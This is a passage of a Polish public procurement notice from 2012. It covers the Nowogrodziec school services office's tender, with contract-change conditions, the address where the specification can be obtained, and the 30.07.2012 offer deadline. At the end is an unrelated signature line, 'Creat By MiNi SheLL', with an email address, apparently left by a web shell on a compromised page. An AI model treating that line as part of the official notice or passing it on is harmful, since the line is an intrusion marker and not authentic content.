- powstaniu rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie będzie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności 
i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony;
 - gdy zaistnieje potrzeba wydzielenia dodatkowej trasy przejazdu lub zakupu biletu na trasie przejazdu nie uwzględnionej w SIWZ.
- gdy zaistnieje inna niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.nowogrodziec.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Obsługi Szkół w Nowogrodźcu, ul. Adama Asnyka 53/1, 59-730 Nowogrodziec.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.07.2012 godzina 10:45, miejsce: Zakład Obsługi Szkół w Nowogrodźcu, ul. Adama Asnyka 53/1, 59-730 Nowogrodziec  (budynek Miejsko Gminnego Ośrodka Pomocy Społecznej, wejście od tyłu od strony parkingu).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com